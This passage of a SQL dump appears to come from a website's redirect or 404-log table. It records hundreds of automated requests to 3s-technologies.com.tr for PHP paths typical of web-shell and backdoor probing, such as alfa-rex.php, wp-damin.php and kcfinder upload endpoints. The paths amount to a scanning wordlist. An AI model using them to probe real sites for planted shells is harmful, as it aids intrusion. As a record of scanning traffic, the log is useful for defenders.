14:14:35','0000-00-00 00:00:00',301),(55299,'http://mail.3s-technologies.com.tr/en/bless14.php',NULL,'','',1,0,'2026-01-05 14:14:36','0000-00-00 00:00:00',301),(55300,'http://mail.3s-technologies.com.tr/en/ws35.php',NULL,'','',2,0,'2026-01-05 14:14:37','0000-00-00 00:00:00',301),(55301,'http://mail.3s-technologies.com.tr/en/nox.ph',NULL,'','',1,0,'2026-01-05 14:14:44','0000-00-00 00:00:00',301),(55302,'http://mail.3s-technologies.com.tr/en/lisa.php',NULL,'','',1,0,'2026-01-05 14:14:45','0000-00-00 00:00:00',301),(55303,'http://mail.3s-technologies.com.tr/en/000.php',NULL,'','',1,0,'2026-01-05 14:14:46','0000-00-00 00:00:00',301),(55304,'http://mail.3s-technologies.com.tr/en/xxxx.php',NULL,'','',1,0,'2026-01-05 14:14:47','0000-00-00 00:00:00',301),(55305,'http://mail.3s-technologies.com.tr/en/f2f.php',NULL,'','',1,0,'2026-01-05 14:14:49','0000-00-00 00:00:00',301),(55306,'http://mail.3s-technologies.com.tr/en/ths.php',NULL,'','',1,0,'2026-01-05 14:14:49','0000-00-00 00:00:00',301),(55307,'http://mail.3s-technologies.com.tr/en/amax.php',NULL,'','',1,0,'2026-01-05 14:14:50','0000-00-00 00:00:00',301),(55308,'http://mail.3s-technologies.com.tr/en/990.php',NULL,'','',1,0,'2026-01-05 14:14:51','0000-00-00 00:00:00',301),(55309,'http://mail.3s-technologies.com.tr/en/d996699999.php',NULL,'','',1,0,'2026-01-05 14:14:53','0000-00-00 00:00:00',301),(55310,'http://mail.3s-technologies.com.tr/en/ierne.php',NULL,'','',1,0,'2026-01-05 14:14:54','0000-00-00 00:00:00',301),(55311,'http://mail.3s-technologies.com.tr/en/xde.php',NULL,'','',1,0,'2026-01-05 14:14:55','0000-00-00 00:00:00',301),(55312,'http://mail.3s-technologies.com.tr/en/gettest.php',NULL,'','',1,0,'2026-01-05 14:14:57','0000-00-00 00:00:00',301),(55313,'http://mail.3s-technologies.com.tr/en/bjfl.php',NULL,'','',1,0,'2026-01-05 14:14:58','0000-00-00 00:00:00',301),(55314,'http://mail.3s-technologies.com.tr/en/wp-content/plugins/wp-help/mini.php',NULL,'','',1,0,'2026-01-05 14:14:59','0000-00-00 00:00:00',301),(55315,'http://mail.3s-technologies.com.tr/en/phpformbuilder/plugins/filemanager/dialog.php',NULL,'','',1,0,'2026-01-05 14:15:00','0000-00-00 00:00:00',301),(55316,'http://mail.3s-technologies.com.tr/en/wp-content/cloud.php',NULL,'','',1,0,'2026-01-05 14:15:01','0000-00-00 00:00:00',301),(55317,'http://mail.3s-technologies.com.tr/en/wp-includesmaps/file.php',NULL,'','',1,0,'2026-01-05 14:15:02','0000-00-00 00:00:00',301),(55318,'http://mail.3s-technologies.com.tr/en/yl10gohp.php',NULL,'','',1,0,'2026-01-05 14:15:03','0000-00-00 00:00:00',301),(55319,'http://mail.3s-technologies.com.tr/en/wp-includes/js/tinymce/plugins/wpview/wp/about.php',NULL,'','',1,0,'2026-01-05 14:15:04','0000-00-00 00:00:00',301),(55320,'http://mail.3s-technologies.com.tr/en/wp-includes/text/diff/defaults.php',NULL,'','',1,0,'2026-01-05 14:15:06','0000-00-00 00:00:00',301),(55321,'http://mail.3s-technologies.com.tr/en/djfksr4.php',NULL,'','',1,0,'2026-01-05 14:15:07','0000-00-00 00:00:00',301),(55322,'http://mail.3s-technologies.com.tr/en/wp-admin/css/post.php',NULL,'','',1,0,'2026-01-05 14:15:08','0000-00-00 00:00:00',301),(55323,'http://mail.3s-technologies.com.tr/en/image/cache/catalog/bookmarks/ksk2-187/ovvwe25ppyla.php',NULL,'','',1,0,'2026-01-05 14:15:09','0000-00-00 00:00:00',301),(55324,'http://mail.3s-technologies.com.tr/en/wp-upload.php',NULL,'','',1,0,'2026-01-05 14:15:10','0000-00-00 00:00:00',301),(55325,'http://mail.3s-technologies.com.tr/en/file51.php',NULL,'','',1,0,'2026-01-05 14:15:11','0000-00-00 00:00:00',301),(55326,'http://mail.3s-technologies.com.tr/en/unrubbish.php',NULL,'','',1,0,'2026-01-05 14:15:12','0000-00-00 00:00:00',301),(55327,'http://mail.3s-technologies.com.tr/en/strubbly.php',NULL,'','',1,0,'2026-01-05 14:15:13','0000-00-00 00:00:00',301),(55328,'http://mail.3s-technologies.com.tr/en/tiqdc.php',NULL,'','',1,0,'2026-01-05 14:15:14','0000-00-00 00:00:00',301),(55329,'http://mail.3s-technologies.com.tr/en/hdwta.php',NULL,'','',1,0,'2026-01-05 14:15:15','0000-00-00 00:00:00',301),(55330,'http://mail.3s-technologies.com.tr/en/infected.php',NULL,'','',1,0,'2026-01-05 14:15:16','0000-00-00 00:00:00',301),(55331,'http://mail.3s-technologies.com.tr/en/maint.php',NULL,'','',1,0,'2026-01-05 14:15:17','0000-00-00 00:00:00',301),(55332,'http://mail.3s-technologies.com.tr/en/mans.php',NULL,'','',1,0,'2026-01-05 14:15:18','0000-00-00 00:00:00',301),(55333,'http://mail.3s-technologies.com.tr/en/o-simple.php',NULL,'','',1,0,'2026-01-05 14:15:19','0000-00-00 00:00:00',301),(55334,'http://mail.3s-technologies.com.tr/en/wp-ana.php',NULL,'','',1,0,'2026-01-05 14:15:20','0000-00-00 00:00:00',301),(55335,'http://mail.3s-technologies.com.tr/en/ctex1.php',NULL,'','',1,0,'2026-01-05 14:15:21','0000-00-00 00:00:00',301),(55336,'http://mail.3s-technologies.com.tr/en/wsz.php',NULL,'','',1,0,'2026-01-05 14:15:22','0000-00-00 00:00:00',301),(55337,'http://mail.3s-technologies.com.tr/en/ahy66.php',NULL,'','',1,0,'2026-01-05 14:15:23','0000-00-00 00:00:00',301),(55338,'http://mail.3s-technologies.com.tr/en/pt.php',NULL,'','',1,0,'2026-01-05 14:15:26','0000-00-00 00:00:00',301),(55339,'http://mail.3s-technologies.com.tr/en/abruzi.php',NULL,'','',1,0,'2026-01-05 14:15:27','0000-00-00 00:00:00',301),(55340,'http://mail.3s-technologies.com.tr/en/wp-is.php',NULL,'','',1,0,'2026-01-05 14:15:29','0000-00-00 00:00:00',301),(55341,'http://mail.3s-technologies.com.tr/en/hd.php',NULL,'','',1,0,'2026-01-05 14:15:30','0000-00-00 00:00:00',301),(55342,'http://mail.3s-technologies.com.tr/en/alex-cross.php',NULL,'','',1,0,'2026-01-05 14:15:31','0000-00-00 00:00:00',301),(55343,'http://mail.3s-technologies.com.tr/en/f35.php',NULL,'','',1,0,'2026-01-05 14:15:32','0000-00-00 00:00:00',301),(55344,'http://mail.3s-technologies.com.tr/en/ioxi-o1.php',NULL,'','',1,0,'2026-01-05 14:15:33','0000-00-00 00:00:00',301),(55345,'http://mail.3s-technologies.com.tr/en/juuuu.php',NULL,'','',1,0,'2026-01-05 14:15:34','0000-00-00 00:00:00',301),(55346,'http://mail.3s-technologies.com.tr/en/ha.php',NULL,'','',1,0,'2026-01-05 14:15:35','0000-00-00 00:00:00',301),(55347,'http://mail.3s-technologies.com.tr/en/gg.php',NULL,'','',1,0,'2026-01-05 14:15:36','0000-00-00 00:00:00',301),(55348,'http://mail.3s-technologies.com.tr/en/we2.php',NULL,'','',1,0,'2026-01-05 14:15:37','0000-00-00 00:00:00',301),(55349,'http://mail.3s-technologies.com.tr/en/333.php',NULL,'','',1,0,'2026-01-05 14:15:40','0000-00-00 00:00:00',301),(55350,'http://mail.3s-technologies.com.tr/en/520.php',NULL,'','',1,0,'2026-01-05 14:15:41','0000-00-00 00:00:00',301),(55351,'http://mail.3s-technologies.com.tr/en/ar.php',NULL,'','',1,0,'2026-01-05 14:15:42','0000-00-00 00:00:00',301),(55352,'http://mail.3s-technologies.com.tr/en/xx.php',NULL,'','',2,0,'2026-01-05 14:15:44','0000-00-00 00:00:00',301),(55353,'http://mail.3s-technologies.com.tr/en/gifclass4.php',NULL,'','',1,0,'2026-01-05 14:15:45','0000-00-00 00:00:00',301),(55354,'http://mail.3s-technologies.com.tr/en/ave.php',NULL,'','',1,0,'2026-01-05 14:15:47','0000-00-00 00:00:00',301),(55355,'http://mail.3s-technologies.com.tr/en/wrt.php',NULL,'','',1,0,'2026-01-05 14:15:49','0000-00-00 00:00:00',301),(55356,'http://mail.3s-technologies.com.tr/en/bibil.php',NULL,'','',1,0,'2026-01-05 14:15:50','0000-00-00 00:00:00',301),(55357,'http://mail.3s-technologies.com.tr/en/file7.php',NULL,'','',1,0,'2026-01-05 14:15:53','0000-00-00 00:00:00',301),(55358,'http://mail.3s-technologies.com.tr/en/gifclass.php',NULL,'','',1,0,'2026-01-05 14:15:54','0000-00-00 00:00:00',301),(55359,'http://mail.3s-technologies.com.tr/en/wp-admin/css/colors/midnight/about.php',NULL,'','',1,0,'2026-01-05 14:15:54','0000-00-00 00:00:00',301),(55360,'http://mail.3s-technologies.com.tr/en/nox.php',NULL,'','',1,0,'2026-01-05 14:15:55','0000-00-00 00:00:00',301),(55361,'http://mail.3s-technologies.com.tr/en/file48.php',NULL,'','',1,0,'2026-01-05 14:15:57','0000-00-00 00:00:00',301),(55362,'http://mail.3s-technologies.com.tr/en/info.php',NULL,'','',1,0,'2026-01-05 14:15:58','0000-00-00 00:00:00',301),(55363,'http://mail.3s-technologies.com.tr/en/class9.php',NULL,'','',1,0,'2026-01-05 14:15:59','0000-00-00 00:00:00',301),(55364,'http://mail.3s-technologies.com.tr/en/la.php',NULL,'','',1,0,'2026-01-05 14:16:00','0000-00-00 00:00:00',301),(55365,'http://mail.3s-technologies.com.tr/en/bless11.php',NULL,'','',1,0,'2026-01-05 14:16:01','0000-00-00 00:00:00',301),(55366,'http://mail.3s-technologies.com.tr/en/ccou.php',NULL,'','',1,0,'2026-01-05 14:16:02','0000-00-00 00:00:00',301),(55367,'http://mail.3s-technologies.com.tr/en/ton.php',NULL,'','',1,0,'2026-01-05 14:16:03','0000-00-00 00:00:00',301),(55368,'http://mail.3s-technologies.com.tr/en/lufix1.php',NULL,'','',1,0,'2026-01-05 14:16:04','0000-00-00 00:00:00',301),(55369,'http://3s-technologies.com.tr/en/gastenboek.php',NULL,'','',2,0,'2026-01-05 16:46:21','0000-00-00 00:00:00',301),(55370,'http://3s-technologies.com.tr/en/third_party/kcfinder/upload.php',NULL,'','',2,0,'2026-01-05 16:46:22','0000-00-00 00:00:00',301),(55371,'http://3s-technologies.com.tr/en/lock11.php',NULL,'','',2,0,'2026-01-05 16:46:23','0000-00-00 00:00:00',301),(55372,'http://3s-technologies.com.tr/en/api137.php',NULL,'','',2,0,'2026-01-05 16:46:24','0000-00-00 00:00:00',301),(55373,'http://3s-technologies.com.tr/en/class629.php',NULL,'','',2,0,'2026-01-05 16:46:24','0000-00-00 00:00:00',301),(55374,'http://3s-technologies.com.tr/en/wp670.php',NULL,'','',2,0,'2026-01-05 16:46:25','0000-00-00 00:00:00',301),(55375,'http://3s-technologies.com.tr/en/xxxx.php',NULL,'','',1,0,'2026-01-05 16:46:26','0000-00-00 00:00:00',301),(55376,'http://3s-technologies.com.tr/en/wp-admin/userk.php',NULL,'','',2,0,'2026-01-05 16:46:29','0000-00-00 00:00:00',301),(55377,'http://3s-technologies.com.tr/en/skinmain.php',NULL,'','',2,0,'2026-01-05 16:46:29','0000-00-00 00:00:00',301),(55378,'http://3s-technologies.com.tr/en/.well-known/new.php',NULL,'','',2,0,'2026-01-05 16:46:30','0000-00-00 00:00:00',301),(55379,'http://3s-technologies.com.tr/en/orxnwdbb.php',NULL,'','',2,0,'2026-01-05 16:46:31','0000-00-00 00:00:00',301),(55380,'http://3s-technologies.com.tr/en/fs8.php',NULL,'','',2,0,'2026-01-05 16:46:32','0000-00-00 00:00:00',301),(55381,'http://3s-technologies.com.tr/en/wp-admin/includes/links.php',NULL,'','',2,0,'2026-01-05 16:46:33','0000-00-00 00:00:00',301),(55382,'http://3s-technologies.com.tr/en/adminer-4.5.0-mysql.php',NULL,'','',2,0,'2026-01-05 16:46:34','0000-00-00 00:00:00',301),(55383,'http://3s-technologies.com.tr/en/site/wp-class.php',NULL,'','',2,0,'2026-01-05 16:46:35','0000-00-00 00:00:00',301),(55384,'http://3s-technologies.com.tr/en/video.php',NULL,'','',2,0,'2026-01-05 16:46:36','0000-00-00 00:00:00',301),(55385,'http://3s-technologies.com.tr/en/an8.php',NULL,'','',1,0,'2026-01-05 16:46:36','0000-00-00 00:00:00',301),(55386,'http://3s-technologies.com.tr/en/scgi-bin.php',NULL,'','',2,0,'2026-01-05 16:46:37','0000-00-00 00:00:00',301),(55387,'http://3s-technologies.com.tr/en/finest09.php',NULL,'','',2,0,'2026-01-05 16:46:38','0000-00-00 00:00:00',301),(55388,'http://3s-technologies.com.tr/en/iov.php',NULL,'','',2,0,'2026-01-05 16:46:39','0000-00-00 00:00:00',301),(55389,'http://3s-technologies.com.tr/en/hly.php',NULL,'','',1,0,'2026-01-05 16:46:40','0000-00-00 00:00:00',301),(55390,'http://3s-technologies.com.tr/en/.well-known/ioxi-o.php',NULL,'','',2,0,'2026-01-05 16:46:42','0000-00-00 00:00:00',301),(55391,'http://3s-technologies.com.tr/en/.well-known.php',NULL,'','',2,0,'2026-01-05 16:46:43','0000-00-00 00:00:00',301),(55392,'http://3s-technologies.com.tr/en/2024.php',NULL,'','',2,0,'2026-01-05 16:46:46','0000-00-00 00:00:00',301),(55393,'http://3s-technologies.com.tr/en/diff.php',NULL,'','',2,0,'2026-01-05 16:46:48','0000-00-00 00:00:00',301),(55394,'http://3s-technologies.com.tr/en/engine.php',NULL,'','',2,0,'2026-01-05 16:46:48','0000-00-00 00:00:00',301),(55395,'http://3s-technologies.com.tr/en/id3.php',NULL,'','',2,0,'2026-01-05 16:46:49','0000-00-00 00:00:00',301),(55396,'http://3s-technologies.com.tr/en/ixr.php',NULL,'','',2,0,'2026-01-05 16:46:50','0000-00-00 00:00:00',301),(55397,'http://3s-technologies.com.tr/en/simplepie.php',NULL,'','',2,0,'2026-01-05 16:46:50','0000-00-00 00:00:00',301),(55398,'http://3s-technologies.com.tr/en/aahana.php',NULL,'','',2,0,'2026-01-05 16:46:52','0000-00-00 00:00:00',301),(55399,'http://3s-technologies.com.tr/en/acme-challenge.php',NULL,'','',1,0,'2026-01-05 16:46:53','0000-00-00 00:00:00',301),(55400,'http://3s-technologies.com.tr/en/alfa-rex.php',NULL,'','',1,0,'2026-01-05 16:46:54','0000-00-00 00:00:00',301),(55401,'http://3s-technologies.com.tr/en/assets.php',NULL,'','',1,0,'2026-01-05 16:46:56','0000-00-00 00:00:00',301),(55402,'http://3s-technologies.com.tr/en/baxa1.php8',NULL,'','',1,0,'2026-01-05 16:46:59','0000-00-00 00:00:00',301),(55403,'http://3s-technologies.com.tr/en/ben.php',NULL,'','',1,0,'2026-01-05 16:46:59','0000-00-00 00:00:00',301),(55404,'http://3s-technologies.com.tr/en/block-patterns.php',NULL,'','',1,0,'2026-01-05 16:47:01','0000-00-00 00:00:00',301),(55405,'http://3s-technologies.com.tr/en/block-supports.php',NULL,'','',1,0,'2026-01-05 16:47:01','0000-00-00 00:00:00',301),(55406,'http://3s-technologies.com.tr/en/blocks.php',NULL,'','',1,0,'2026-01-05 16:47:02','0000-00-00 00:00:00',301),(55407,'http://3s-technologies.com.tr/en/cay-van-phong.php',NULL,'','',1,0,'2026-01-05 16:47:04','0000-00-00 00:00:00',301),(55408,'http://3s-technologies.com.tr/en/cgi-bin.php',NULL,'','',1,0,'2026-01-05 16:47:05','0000-00-00 00:00:00',301),(55409,'http://3s-technologies.com.tr/en/codemirror.php',NULL,'','',1,0,'2026-01-05 16:47:08','0000-00-00 00:00:00',301),(55410,'http://3s-technologies.com.tr/en/coffee.php',NULL,'','',1,0,'2026-01-05 16:47:09','0000-00-00 00:00:00',301),(55411,'http://3s-technologies.com.tr/en/colors.php',NULL,'','',1,0,'2026-01-05 16:47:10','0000-00-00 00:00:00',301),(55412,'http://3s-technologies.com.tr/en/css_compare.php',NULL,'','',1,0,'2026-01-05 16:47:13','0000-00-00 00:00:00',301),(55413,'http://3s-technologies.com.tr/en/elements.php',NULL,'','',1,0,'2026-01-05 16:47:18','0000-00-00 00:00:00',301),(55414,'http://3s-technologies.com.tr/en/endpoints.php',NULL,'','',1,0,'2026-01-05 16:47:19','0000-00-00 00:00:00',301),(55415,'http://3s-technologies.com.tr/en/files.php',NULL,'','',8,0,'2026-01-05 16:47:21','0000-00-00 00:00:00',301),(55416,'http://3s-technologies.com.tr/en/fonts.php',NULL,'','',1,0,'2026-01-05 16:47:23','0000-00-00 00:00:00',301),(55417,'http://3s-technologies.com.tr/en/fucku.php',NULL,'','',1,0,'2026-01-05 16:47:23','0000-00-00 00:00:00',301),(55418,'http://3s-technologies.com.tr/en/gecko-litespeed.php',NULL,'','',1,0,'2026-01-05 16:47:25','0000-00-00 00:00:00',301),(55419,'http://3s-technologies.com.tr/en/getid3s.php',NULL,'','',1,0,'2026-01-05 16:47:25','0000-00-00 00:00:00',301),(55420,'http://3s-technologies.com.tr/en/google-seo-rank.php',NULL,'','',1,0,'2026-01-05 16:47:27','0000-00-00 00:00:00',301),(55421,'http://3s-technologies.com.tr/en/hellopress.php',NULL,'','',1,0,'2026-01-05 16:47:29','0000-00-00 00:00:00',301),(55422,'http://3s-technologies.com.tr/en/html-api.php',NULL,'','',1,0,'2026-01-05 16:47:29','0000-00-00 00:00:00',301),(55423,'http://3s-technologies.com.tr/en/img.php',NULL,'','',1,0,'2026-01-05 16:47:31','0000-00-00 00:00:00',301),(55424,'http://3s-technologies.com.tr/en/json.php',NULL,'','',1,0,'2026-01-05 16:47:38','0000-00-00 00:00:00',301),(55425,'http://3s-technologies.com.tr/en/languages.php',NULL,'','',1,0,'2026-01-05 16:47:39','0000-00-00 00:00:00',301),(55426,'http://3s-technologies.com.tr/en/linkpreview.php',NULL,'','',1,0,'2026-01-05 16:47:40','0000-00-00 00:00:00',301),(55427,'http://3s-technologies.com.tr/en/maint.php',NULL,'','',1,0,'2026-01-05 16:47:44','0000-00-00 00:00:00',301),(55428,'http://3s-technologies.com.tr/en/media.php.infected.php',NULL,'','',1,0,'2026-01-05 16:47:47','0000-00-00 00:00:00',301),(55429,'http://3s-technologies.com.tr/en/menu.php',NULL,'','',1,0,'2026-01-05 16:47:48','0000-00-00 00:00:00',301),(55430,'http://3s-technologies.com.tr/en/mod_simplefileuploadv1.3.php',NULL,'','',1,0,'2026-01-05 16:47:48','0000-00-00 00:00:00',301),(55431,'http://3s-technologies.com.tr/en/modules.php',NULL,'','',1,0,'2026-01-05 16:47:49','0000-00-00 00:00:00',301),(55432,'http://3s-technologies.com.tr/en/mpvloi.php',NULL,'','',1,0,'2026-01-05 16:47:50','0000-00-00 00:00:00',301),(55433,'http://3s-technologies.com.tr/en/mu-plugins.php',NULL,'','',1,0,'2026-01-05 16:47:51','0000-00-00 00:00:00',301),(55434,'http://3s-technologies.com.tr/en/php-compat.php',NULL,'','',1,0,'2026-01-05 16:47:53','0000-00-00 00:00:00',301),(55435,'http://3s-technologies.com.tr/en/pki-validation.php',NULL,'','',1,0,'2026-01-05 16:47:54','0000-00-00 00:00:00',301),(55436,'http://3s-technologies.com.tr/en/providers.php',NULL,'','',1,0,'2026-01-05 16:47:56','0000-00-00 00:00:00',301),(55437,'http://3s-technologies.com.tr/en/rest-api.php',NULL,'','',1,0,'2026-01-05 16:47:58','0000-00-00 00:00:00',301),(55438,'http://3s-technologies.com.tr/en/seoplugins.php',NULL,'','',1,0,'2026-01-05 16:48:00','0000-00-00 00:00:00',301),(55439,'http://3s-technologies.com.tr/en/seotheme.php',NULL,'','',1,0,'2026-01-05 16:48:00','0000-00-00 00:00:00',301),(55440,'http://3s-technologies.com.tr/en/sitemaps.php',NULL,'','',1,0,'2026-01-05 16:48:02','0000-00-00 00:00:00',301),(55441,'http://3s-technologies.com.tr/en/smilies.php',NULL,'','',1,0,'2026-01-05 16:48:03','0000-00-00 00:00:00',301),(55442,'http://3s-technologies.com.tr/en/sodium_compat.php',NULL,'','',1,0,'2026-01-05 16:48:04','0000-00-00 00:00:00',301),(55443,'http://3s-technologies.com.tr/en/style-engine.php',NULL,'','',1,0,'2026-01-05 16:48:04','0000-00-00 00:00:00',301),(55444,'http://3s-technologies.com.tr/en/theme-compat.php',NULL,'','',1,0,'2026-01-05 16:48:07','0000-00-00 00:00:00',301),(55445,'http://3s-technologies.com.tr/en/twentytwentytwo.php',NULL,'','',1,0,'2026-01-05 16:48:09','0000-00-00 00:00:00',301),(55446,'http://3s-technologies.com.tr/en/upgrade-temp-backup.php',NULL,'','',1,0,'2026-01-05 16:48:11','0000-00-00 00:00:00',301),(55447,'http://3s-technologies.com.tr/en/widgets.php',NULL,'','',1,0,'2026-01-05 16:48:15','0000-00-00 00:00:00',301),(55448,'http://3s-technologies.com.tr/en/wlw.php',NULL,'','',1,0,'2026-01-05 16:48:16','0000-00-00 00:00:00',301),(55449,'http://3s-technologies.com.tr/en/wp-damin.php',NULL,'','',1,0,'2026-01-05 16:48:20','0000-00-00 00:00:00',301),(55450,'http://3s-technologies.com.tr/en/wp-includes.php',NULL,'','',1,0,'2026-01-05 16:48:22','0000-00-00 00:00:00',301),(55451,'http://3s-technologies.com.tr/en/wp_filemanager.php',NULL,'','',1,0,'2026-01-05 16:48:25','0000-00-00 00:00:00',301),(55452,'http://3s-technologies.com.tr/en/xp.php',NULL,'','',1,0,'2026-01-05 16:48:25','0000-00-00 00:00:00',301),(55453,'http://3s-technologies.com.tr/en/yes.php',NULL,'','',1,0,'2026-01-05 16:48:26','0000-00-00 00:00:00',301),(55454,'http://3s-technologies.com.tr/en/has.php',NULL,'','',1,0,'2026-01-05 16:48:29','0000-00-00 00:00:00',301),(55455,'http://3s-technologies.com.tr/en/nax.php',NULL,'','',1,0,'2026-01-05 16:48:29','0000-00-00 00:00:00',301),(55456,'http://3s-technologies.com.tr/en/ooj.php',NULL,'','',1,0,'2026-01-05 16:48:30','0000-00-00 00:00:00',301),(55457,'http://3s-technologies.com.tr/en/orm.php',NULL,'','',1,0,'2026-01-05 16:48:31','0000-00-00 00:00:00',301),(55458,'http://3s-technologies.com.tr/en/yep.php',NULL,'','',1,0,'2026-01-05 16:48:31','0000-00-00 00:00:00',301),(55459,'http://3s-technologies.com.tr/en/x3.php',NULL,'','',1,0,'2026-01-05 16:48:32','0000-00-00 00:00:00',301),(55460,'http://3s-technologies.com.tr/en/ggfi.php',NULL,'','',1,0,'2026-01-05 16:48:34','0000-00-00 00:00:00',301),(55461,'http://3s-technologies.com.tr/en/wrt.php',NULL,'','',1,0,'2026-01-05 16:48:34','0000-00-00 00:00:00',301),(55462,'http://3s-technologies.com.tr/en/jju.php',NULL,'','',1,0,'2026-01-05 16:48:35','0000-00-00 00:00:00',301),(55463,'http://3s-technologies.com.tr/en/rsnu.php',NULL,'','',1,0,'2026-01-05 16:48:36','0000-00-00 00:00:00',301),(55464,'http://3s-technologies.com.tr/en/lc.php',NULL,'','',1,0,'2026-01-05 16:48:36','0000-00-00 00:00:00',301),(55465,'http://3s-technologies.com.tr/en/gold.php',NULL,'','',1,0,'2026-01-05 16:48:38','0000-00-00 00:00:00',301),(55466,'http://3s-technologies.com.tr/en/aua.php',NULL,'','',1,0,'2026-01-05 16:48:39','0000-00-00 00:00:00',301),(55467,'http://3s-technologies.com.tr/en/ot.php',NULL,'','',1,0,'2026-01-05 16:48:43','0000-00-00 00:00:00',301),(55468,'http://3s-technologies.com.tr/en/witmm.php',NULL,'','',1,0,'2026-01-05 16:48:43','0000-00-00 00:00:00',301),(55469,'http://3s-technologies.com.tr/en/rxzx.php',NULL,'','',1,0,'2026-01-05 16:48:44','0000-00-00 00:00:00',301),(55470,'http://3s-technologies.com.tr/en/ocxla.php',NULL,'','',1,0,'2026-01-05 16:48:45','0000-00-00 00:00:00',301),(55471,'http://3s-technologies.com.tr/en/tt.php',NULL,'','',1,0,'2026-01-05 16:48:45','0000-00-00 00:00:00',301),(55472,'http://3s-technologies.com.tr/en/jga.php',NULL,'','',3,0,'2026-01-05 16:48:46','0000-00-00 00:00:00',301),(55473,'http://3s-technologies.com.tr/en/resp.php',NULL,'','',1,0,'2026-01-05 16:48:47','0000-00-00 00:00:00',301),(55474,'http://3s-technologies.com.tr/en/100.kb.php',NULL,'','',1,0,'2026-01-05 16:48:47','0000-00-00 00:00:00',301),(55475,'http://3s-technologies.com.tr/en/gec.php',NULL,'','',1,0,'2026-01-05 16:48:48','0000-00-00 00:00:00',301),(55476,'http://3s-technologies.com.tr/en/wqqs.php',NULL,'','',1,0,'2026-01-05 16:48:49','0000-00-00 00:00:00',301),(55477,'http://3s-technologies.com.tr/en/zwq13.php',NULL,'','',1,0,'2026-01-05 16:48:50','0000-00-00 00:00:00',301),(55478,'http://3s-technologies.com.tr/en/rtx.php',NULL,'','',1,0,'2026-01-05 16:48:50','0000-00-00 00:00:00',301),(55479,'http://3s-technologies.com.tr/en/fs6.php',NULL,'','',1,0,'2026-01-05 16:48:52','0000-00-00 00:00:00',301),(55480,'http://3s-technologies.com.tr/en/byp8.php',NULL,'','',3,0,'2026-01-05 16:48:53','0000-00-00 00:00:00',301),(55481,'http://3s-technologies.com.tr/en/clasa99.php',NULL,'','',1,0,'2026-01-05 16:48:54','0000-00-00 00:00:00',301),(55482,'http://3s-technologies.com.tr/en/fasx.php',NULL,'','',1,0,'2026-01-05 16:48:55','0000-00-00 00:00:00',301),(55483,'http://3s-technologies.com.tr/en/moon3.php',NULL,'','',1,0,'2026-01-05 16:48:56','0000-00-00 00:00:00',301),(55484,'http://3s-technologies.com.tr/en/x7x.php',NULL,'','',1,0,'2026-01-05 16:48:56','0000-00-00 00:00:00',301),(55485,'http://3s-technologies.com.tr/en/c4.php',NULL,'','',1,0,'2026-01-05 16:48:57','0000-00-00 00:00:00',301),(55486,'http://3s-technologies.com.tr/en/ov-simple1.php',NULL,'','',1,0,'2026-01-05 16:48:58','0000-00-00 00:00:00',301),(55487,'http://3s-technologies.com.tr/en/gmo.php',NULL,'https://www.yahoo.com/','',4,0,'2026-01-05 18:52:58','0000-00-00 00:00:00',301),(55488,'http://3s-technologies.com.tr/en/block-bindings.php',NULL,'https://www.google.co.uk/','',1,0,'2026-01-05 18:53:11','0000-00-00 00:00:00',301),(55489,'http://mail.3s-technologies.com.tr/tr/ca4.php',NULL,'','',5,0,'2026-01-06 17:21:20','0000-00-00 00:00:00',301),(55490,'http://mail.3s-technologies.com.tr/tr/inwp.php',NULL,'','',10,0,'2026-01-06 17:21:22','0000-00-00 00:00:00',301),(55491,'http://mail.3s-technologies.com.tr/tr/tanjiro.php',NULL,'','',4,0,'2026-01-06 17:21:25','0000-00-00 00:00:00',301),(55492,'http://mail.3s-technologies.com.tr/tr/wefile.php',NULL,'','',10,0,'2026-01-06 17:21:26','0000-00-00 00:00:00',301),(55493,'http://mail.3s-technologies.com.tr/tr/ad1.php',NULL,'','',10,0,'2026-01-06 17:21:27','0000-00-00 00:00:00',301),(55494,'http://mail.3s-technologies.com.tr/tr/bjfl.php',NULL,'','',13,0,'2026-01-06 17:21:28','0000-00-00 00:00:00',301),(55495,'http://mail.3s-technologies.com.tr/tr/anz.php',NULL,'','',4,0,'2026-01-06 17:21:30','0000-00-00 00:00:00',301),(55496,'http://mail.3s-technologies.com.tr/tr/bnn_.php',NULL,'','',11,0,'2026-01-06 17:21:31','0000-00-00 00:00:00',301),(55497,'http://mail.3s-technologies.com.tr/tr/motu.php',NULL,'','',51,0,'2026-01-06 17:21:32','0000-00-00 00:00:00',301),(55498,'http://mail.3s-technologies.com.tr/tr/file66.php',NULL,'','',4,0,'2026-01-06 17:21:33','0000-00-00 00:00:00',301),(55499,'http://mail.3s-technologies.com.tr/tr/kure.php',NULL,'','',4,0,'2026-01-06 17:21:34','0000-00-00 00:00:00',301),(55500,'http://mail.3s-technologies.com.tr/tr/gaje.php',NULL,'','',4,0,'2026-01-06 17:21:35','0000-00-00 00:00:00',301),(55501,'http://mail.3s-technologies.com.tr/tr/blnux.php',NULL,'','',7,0,'2026-01-06 17:21:36','0000-00-00 00:00:00',301),(55502,'http://mail.3s-technologies.com.tr/tr/fgd.php',NULL,'','',10,0,'2026-01-06 17:21:37','0000-00-00 00:00:00',301),(55503,'http://mail.3s-technologies.com.tr/tr/msy.php',NULL,'','',4,0,'2026-01-06 17:21:38','0000-00-00 00:00:00',301),(55504,'http://mail.3s-technologies.com.tr/tr/alog.php',NULL,'','',4,0,'2026-01-06 17:21:39','0000-00-00 00:00:00',301),(55505,'http://mail.3s-technologies.com.tr/tr/x7t6.php',NULL,'','',10,0,'2026-01-06 17:21:40','0000-00-00 00:00:00',301),(55506,'http://mail.3s-technologies.com.tr/tr/xwpg.php',NULL,'','',14,0,'2026-01-06 17:21:41','0000-00-00 00:00:00',301),(55507,'http://mail.3s-technologies.com.tr/tr/rk41.php',NULL,'','',10,0,'2026-01-06 17:21:41','0000-00-00 00:00:00',301),(55508,'http://mail.3s-technologies.com.tr/tr/ztv.php',NULL,'','',4,0,'2026-01-06 17:21:42','0000-00-00 00:00:00',301),(55509,'http://mail.3s-technologies.com.tr/tr/sef.php',NULL,'','',4,0,'2026-01-06 17:21:43','0000-00-00 00:00:00',301),(55510,'http://3s-technologies.com.tr/tr/baee.php',NULL,'','',2,0,'2026-01-07 10:17:17','0000-00-00 00:00:00',301),(55511,'http://3s-technologies.com.tr/tr/mga.php',NULL,'','',35,0,'2026-01-07 10:17:18','0000-00-00 00:00:00',301),(55512,'http://3s-technologies.com.tr/tr/rendi59.php',NULL,'','',8,0,'2026-01-07 10:17:18','0000-00-00 00:00:00',301),(55513,'http://3s-technologies.com.tr/tr/bgymj.php',NULL,'','',116,0,'2026-01-07 10:17:19','0000-00-00 